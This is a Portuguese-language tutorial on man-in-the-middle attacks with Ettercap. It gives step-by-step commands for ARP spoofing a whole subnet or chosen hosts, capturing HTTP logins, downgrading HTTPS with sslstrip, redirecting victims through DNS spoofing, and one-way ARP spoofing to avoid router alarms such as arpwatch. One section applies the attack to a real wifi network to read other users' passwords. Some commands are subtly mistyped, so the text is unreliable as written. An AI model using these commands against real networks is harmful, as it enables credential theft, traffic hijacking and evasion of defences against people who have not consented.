Men-In-The-Middle 2 - Ettercap e Ultrapassando a segurança Do Router e de Alarmes - oneway spoofing

Outra forma de ataque Men-In-The-Middle é o Ettercap, uma solução abrangente para esses ataques. Possui sniffing de conexões ao vivo, filtragem de conteúdo sobre o ar e muitos outros truques interessantes. Ele suporta a dissecção ativa e passiva de muitos protocolos e inclui muitos recursos para análise de rede e host.

Primeiro precisamos configurar o Ettercap

Leafpad /etc/Ettercap/etter.conf

Precisa retirar os comentários dessas duas configurações apagando os “#”

Outra mudança necessária será mudar o ec_uid para 0 e o ec_gid para 0

ctrl s para salvar e sair

> ettercap --help

Já podemos ver como utilizar

Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

Podemos ver as interfaces para utilizar

Iremos ver como funciona o modo de texto no GUI

> ettercap -Tq ///

T para modo de texto

Q de quiet

/// sem target

Podemos reparar que ele automaticamente está escaneando por clientes e neste caso conseguiu 4 hosts

Pressionando h podemos ver os comandos

Pressionando L podemos ver todos os clientes com seus IPs e MACs

Bem parecido com o Netdiscover

Vamos fazer q para sair

E realizar o ataque no host 5 do  IP 10.20.215.9

Devemos estar na mesma subnet como vemos na tela abaixo o IP do kali que estamos com o IP 10.20.215.8

Pode-se fazer esse ataque no wifi mas deve estar na mesma subnet

Agora iremos ao ataque:

> ettercap -Tq -M arp:remote -i eth0 ///

-M para especificar o modo de ataque com o argumento arp:remote
-i deve-se escolher a interface que estaja na mesma subnet do target em nosso caso que é a NAT virtual será eth0 porém no caso de ataque wifi será LAN ou o nome de sua interface wireless
-/// Significa que queremos atacar todos os clientes conectados nesta network ou pode-se utilizar os grupos

ou

ettercap -Tq -M arp:remote -i eth0 /GATEWAY// /Target IP//

ex: ettercap -Tq -M arp:remote -i eth0 /10.20.215.1// /10.20.215.9-20//

ou com “,”para especificar outros ips

ex: ettercap -Tq -M arp:remote -i eth0 /10.20.215.1// /10.20.215.9,10.20.215.10//

Pressione Enter e…

Se formos na maquina da vitima e tentar fazer Login em algum site http o kali irá nos dizer o Login e password

Tente na pagina app.dictionary.com/Login

Usando o SSLstrip manualmente

Agora iremos como acessar as paginas https com o sslstrip para downgrade https para http.

Antes queremos que os packets da pagina 80 vá para porta 10000 que estará com o sslstrip através do comando o iptables

> iptables -t -nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

porem na porta 10000 não temos nada funcionando então precisamos fazer o sslstrip funcionar nela

> sslstrip --help

e iremos fazer apenas o comando normal

>sslstrip

agora podemos voltar ao ataque MITM ettercap acrescentando -S para dizer ao ettercap não criar um certificado ssl pois as vezes ele não funciona

> ettercap -Tq -M arp:remote -i eth0 -S /10.20.215.1// /10.20.215.9//

Enter

Se formos no computador da vitima veremos que o https fez downgrade para http

O aviso de perigo não é por causa do ataque, o navegador diz esse ataque para qualquer pagina que não seja https e peça senha

Outro aviso é que o sslstrip funciona somente para paginas https e não para HSTS como o facebook pois o navegador se recusa a abrir essas paginas em http.

Agora a mudança de portas através do iptable pode prejudicar outros tipos de ataque. E iremos anular ele.

> iptables - t nat --flush

Ettercap Plugins

autoadd - irá acionar qualquer outro host que entrar em sua subnet

Iremos mostrar esse ataque em uma rede wifi real

Para isso deve estar na mesma rede wifi

Configurações do kali

iremos fazer o ataque para toda a subnet:

> ettercap -Tq -M arp:remote -i wlan 0 -S ///

- enter

- h para help

- l para ver os hosts

- p para ver os puglins

todos que estão marcados com [0] estão inativos e para ativar só precisa digitar o nome do plugin

> autoadd

Podemos ver quando alguém entra

DNS spoofing com Ettercap

Deve-se mudar os arquivos dns-file

>leafpad /etc/ettercap/etter.dns

Podemos ver que estará redirecionando o Bing para o IP do kali

*.bing.com

Como estaremos redirecionando pessoas para nosso próprio Ip precisamos ter um webserver funcionando

> service apache2 start  

> ettercap -Tq -M arp:remote -i wlan 0 -S -P dns_spoof ///

P dns_spoof é o P de plugin e o nome do plugin

Ultrapassando a segurança Do Router e de Alarmes - oneway spoofing

Esse é um acesso de uma rede normal

Quando um Hacker faz o ARP Spoofing

E a consequência do MITM é

O problema é que se o Roteador tem uma forma de analisar as tabelas ARPs como arpwatch ou qualquer solução contra ataque ARP verificam que tanto o hacker quanto a vitima tem o mesmo MAC Address e alerta que há algo errado e pode até desconectar o hacker da rede.

A solução é fazer um oneway spoofing

Que iremos dizer apenas para a vitima que temos o MAC do router, porem não diremos ao router que temos o MAC da vitima

Dessa forma só iremos receber o request da vitima, porem não receberemos as respostas do router, pois estas irão diretamente para a vitima. Dessa forma dá para ver os usernames, passwords e etc...

Os comandos são:

> ettercap -Tq -M arp:oneway -i eth0 0 -S -P dns_spoof /IP da vitima// /IP do router//

Para poder analisar o que a vitima acessar será necessário pelo wireshark procurar por http e procurar por post em info

Veja também:

https://www.guiadoti.com/2014/08/realizando-ataque-de-dns-spoofing-com-ettercap/